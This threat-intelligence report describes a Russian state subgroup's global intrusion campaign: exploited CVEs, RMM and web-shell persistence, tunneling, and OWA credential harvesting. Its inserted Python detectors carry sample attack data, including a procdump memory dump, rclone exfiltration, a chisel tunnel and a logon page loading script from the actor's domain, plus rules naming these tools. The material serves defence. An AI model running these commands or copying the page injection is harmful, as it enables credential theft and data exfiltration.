BadPilot Campaign Global Cyber Operations by a Seashell Blizzard Subgroup

Summary

Cyble Research Intelligence Labs (CRIL) came across an interesting finding by Microsoft Threat Intelligence, which has uncovered a subgroup within the Russian state actor Seashell Blizzard, tracked as the “BadPilot campaign.” Active since 2021, this subgroup has conducted global cyber intrusions, including recent attacks targeting the U.S. and U.K. by exploiting vulnerabilities in widely used software. Their operations have enabled persistent access to high-value sectors such as energy, telecommunications, shipping, defense, and government, supporting Russia’s strategic objectives, including destructive cyberattacks in Ukraine since 2023.

Seashell Blizzard, linked to Russia’s GRU Unit 74455, is a highly skilled cyber threat actor active since 2013, known for espionage, destructive cyberattacks, and targeting critical infrastructure like energy, government, and military systems, especially during conflicts such as Russia’s invasion of Ukraine. Using tools like Cobalt Strike and DarkCrystalRAT, the group employs targeted, opportunistic, and hybrid methods for network intrusions, often gaining persistent access for further intelligence and disruption. Also known as Sandworm or APT44, Seashell Blizzard remains a significant cyber threat with a focus on high-priority targets.

Technical Details

The Seashell Blizzard initial access subgroup has been opportunistically compromising perimeter infrastructure since late 2021 by exploiting published CVEs through direct scanning and third-party internet scanning services. Post-exploitation, the group employs consistent TTPs for persistence and lateral movement, which have become more evasive over time. At least eight vulnerabilities in server infrastructure, including Microsoft Exchange (CVE-2021-34473), Zimbra (CVE-2022-41352), OpenFire (CVE-2023-32315), and ConnectWise ScreenConnect (CVE-2024-1709), have been exploited, with established persistence often preceding destructive attacks.

Exploitation Patterns:

  1. RMM Suites for Persistence and C2 (2024–Present):

Exploiting ConnectWise ScreenConnect and Fortinet FortiClient EMS, the subgroup deployed RMM tools like Atera Agent and Splashtop for C2, evading detection by masquerading as legitimate utilities. Credential access was achieved through registry dumps, renamed procdump, and Task Manager interactions, while data exfiltration used rclone.exe. The group also deployed OpenSSH with unique public keys and introduced ShadowLink, a Tor-based hidden service providing covert remote access, bypassing traditional C2 channels.

  2. Web Shell Deployment (2021–Present):

Primarily using web shells for persistence post-exploitation, the subgroup leveraged Microsoft Exchange and Zimbra vulnerabilities to deploy custom ASPX web shells (e.g., LocalOlive) for C2 and secondary activities like file uploads, command execution, and port opening. Fingerprinting commands followed web shell deployment, and tunneling tools like Chisel, plink, and rsockstun established reverse tunnels to VPS infrastructure using aliases such as MsChSoft.exe and Msoft.exe.
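The two patterns above (renamed tunneling and dumping tools, rclone with a private config, registry dumps, RMM agents used as C2) are things a defender can triage from process-creation telemetry. The following is an added example, not code from the report or from Microsoft: the event field names, the sample events, the "AteraAgent.exe" process name and the reg.exe save/export rule are assumptions made for this illustration.

```python
import ntpath

# Constructed sample telemetry for this example, loosely modelled on
# process-creation events: image path, PE OriginalFileName, command line.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Temp\MsChSoft.exe", "original_name": "chisel.exe",
     "cmdline": "MsChSoft.exe client 198.51.100.7:443"},
    {"image": r"C:\ProgramData\Msoft.exe", "original_name": "procdump",
     "cmdline": "Msoft.exe -ma 672 C:\\ProgramData\\m.dmp"},
    {"image": r"C:\Users\svc\rclone.exe", "original_name": "rclone.exe",
     "cmdline": "rclone.exe copy D:\\Share remote:bk --config C:\\Users\\svc\\r.conf"},
    {"image": r"C:\Windows\System32\reg.exe", "original_name": "reg.exe",
     "cmdline": "reg.exe query HKLM\\SOFTWARE\\Microsoft\\Windows"},
    {"image": r"C:\Program Files\Atera\AteraAgent.exe", "original_name": "AteraAgent.exe",
     "cmdline": "AteraAgent.exe"},
]

# Masquerading aliases named in the report, and tools the report says ran under them.
REPORTED_ALIASES = {"mschsoft", "msoft", "microsoftexchange32"}
TOOLS_SEEN_RENAMED = {"chisel", "plink", "rsockstun", "procdump"}
# RMM agents the report saw used for C2 (process name assumed); APPROVED_RMM is the
# organisation's sanctioned list, empty here so any agent is surfaced for review.
RMM_AGENTS = {"ateraagent"}
APPROVED_RMM = set()


def _stem(path):
    """Lower-case file name without extension, e.g. 'chisel.exe' -> 'chisel'."""
    return ntpath.splitext(ntpath.basename(path))[0].lower()


def triage(events):
    """Return (rule, image) pairs for events matching the TTPs described above."""
    hits = []
    for ev in events:
        image, stem = ev["image"], _stem(ev["image"])
        orig = _stem(ev.get("original_name", ""))
        args = ev["cmdline"].lower().split()[1:]
        if stem in REPORTED_ALIASES:
            hits.append(("reported-alias", image))
        if orig in TOOLS_SEEN_RENAMED and orig != stem:
            hits.append(("renamed-tool", image))          # PE name != file name on disk
        if stem == "rclone" and "--config" in args:
            hits.append(("rclone-custom-config", image))  # exfil with its own config file
        if stem == "reg" and args and args[0] in ("save", "export"):
            hits.append(("registry-hive-dump", image))
        if stem in RMM_AGENTS and stem not in APPROVED_RMM:
            hits.append(("unsanctioned-rmm", image))
    return hits
```

The renamed-tool rule relies on the PE OriginalFileName recorded by the sensor, so it catches a new alias the moment the actor picks one not yet on any list.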

  3. Infrastructure Modification (2021–2024):

The subgroup modified Outlook Web Access (OWA) sign-in pages with rogue JavaScript to collect credentials in real-time and send them to actor-controlled infrastructure (e.g., hwupdates[.]com). Additionally, DNS A record modifications were observed, potentially for credential interception from critical authentication services.
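Because the OWA tampering is a change to served HTML rather than a new process, the practical control is an integrity check of the logon page against a known-good copy. This is an added example, not code from the report: the sample pages, the script path, the hypothetical hookLogonForm() placeholder and the allow-list parameter are assumptions made for this illustration; the external host is the actor domain the report names.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples: a known-good OWA-style logon page and a tampered copy (placeholder script body).
KNOWN_GOOD_PAGE = """<html><body><form action="/owa/auth.owa" method="post">
<input name="username"><input name="password" type="password"></form>
<script src="/owa/auth/scripts/flogon.js"></script></body></html>"""
TAMPERED_PAGE = KNOWN_GOOD_PAGE.replace("</body>",
    '<script src="https://hwupdates.com/u.js"></script>'  # actor domain from the report
    '<script>/* injected */ hookLogonForm();</script></body>')

class ScriptCollector(HTMLParser):
    """Collect every <script> element as ('src', url) or ('inline', body)."""
    def __init__(self):
        super().__init__()
        self.scripts, self._buf = [], None
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.scripts.append(("src", src))
            else:
                self._buf = ""              # start capturing an inline body
    def handle_data(self, data):
        if self._buf is not None:
            self._buf += data
    def handle_endtag(self, tag):
        if tag == "script" and self._buf is not None:
            self.scripts.append(("inline", self._buf.strip()))
            self._buf = None
    def run(self, html):
        self.feed(html)
        return self.scripts

def script_digests(html):
    """Baseline: SHA-256 of each script's src URL or inline body from a known-good copy."""
    return {hashlib.sha256(v.encode()).hexdigest() for _, v in ScriptCollector().run(html)}

def audit_logon_page(html, baseline, allowed_hosts=()):
    """Flag scripts missing from the baseline and script sources on non-allowlisted hosts."""
    findings = []
    for kind, value in ScriptCollector().run(html):
        if hashlib.sha256(value.encode()).hexdigest() not in baseline:
            findings.append((f"unbaselined-{kind}", value))
        host = urlparse(value).hostname if kind == "src" else None
        if host and host not in allowed_hosts:
            findings.append(("external-script-host", host))
    return findings
```

Take the baseline from a pristine copy of the page at deployment (and refresh it after each Exchange update), and pass the server's own hostnames in allowed_hosts so legitimate absolute script URLs are not flagged.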

This subgroup’s evolving techniques, including the deployment of legitimate tools for persistence, Tor-based remote access, and credential collection through infrastructure modification, demonstrate its advanced capabilities in maintaining long-term access to high-value networks.

The table below highlights the key details of this campaign.

Timeframe: Late 2021 – Present

Targeted Vulnerabilities: Microsoft Exchange (CVE-2021-34473), Zimbra Collaboration (CVE-2022-41352), OpenFire (CVE-2023-32315), JetBrains TeamCity (CVE-2023-42793), Microsoft Outlook (CVE-2023-23397), ConnectWise ScreenConnect (CVE-2024-1709), Fortinet FortiClient EMS (CVE-2023-48788), JBoss (CVE unknown)

Exploitation Patterns:

  1. RMM Suites for Persistence and C2 (2024–Present). Tools: Atera Agent, Splashtop Remote Services. Techniques: reg.exe, renamed procdump, Task Manager LSASS dumps. Data exfiltration: rclone.exe. ShadowLink: Tor-based hidden service for covert access.

  2. Web Shell Deployment for Persistence and C2 (2021–Present). Web shell: LocalOlive (ASPX, C#). Exploited platforms: Microsoft Exchange, Zimbra. Tools: Chisel, plink, rsockstun for tunneling. Malicious emails: sent from ProtonMail/Outlook accounts.

  3. Infrastructure Modification for Credential Collection (2021–2024). OWA modification: JavaScript injection for credential collection. DNS modification: likely for credential interception. Actor-controlled infrastructure: hwupdates[.]com, cloud-sync[.]org

Persistence Methods: RMM tools for stealthy C2, web shells for ongoing access, ShadowLink (Tor hidden services), OpenSSH with unique public keys

Tunneling Utilities: Chisel, plink, rsockstun with aliases such as MsChSoft.exe, MicrosoftExchange32.exe

Data Exfiltration: rclone.exe with custom configuration files

Credential Access: Registry dumps (reg.exe), procdump, LSASS process dumps via the Task Manager UI

Actor-Controlled Infrastructure: Tunneling IPs: 103.201.129[.]130, 104.160.6[.]2, 195.26.87[.]209; Malicious emails: ProtonMail, Outlook addresses

Targets: Ukraine, United States, Canada, United Kingdom, Australia

Conclusion

Seashell Blizzard’s initial access subgroup is expected to continue developing scalable techniques to compromise networks in Ukraine and globally, supporting Russia’s war efforts and national interests. With its broad reach and expanding geographical targets, this subgroup enhances Seashell Blizzard’s operational scope. It provides Russia with ongoing opportunities for cyber operations and strategic advantages in the medium term.

Recommendation

We have listed some essential cybersecurity best practices that create the first line of control against attackers. We recommend that our readers follow the best practices given below:

● Deploy MFA across all critical systems and remote access points to reduce the risk of credential-based attacks. Even if credentials are compromised, MFA adds an additional layer of security, preventing unauthorized access.

● Ensure timely patching of all software, especially Internet-facing infrastructure, by applying security updates for known vulnerabilities (e.g., CVE-2024-1709, CVE-2023-48788). Implement automated tools to scan and update systems, reducing the risk of exploitation by threat actors.

● Segment critical infrastructure from less sensitive networks to limit lateral movement after a breach. Use continuous monitoring tools to detect unusual activities and employ advanced logging and alerting mechanisms for quick incident response.

Written by

FPT Metrodata Indonesia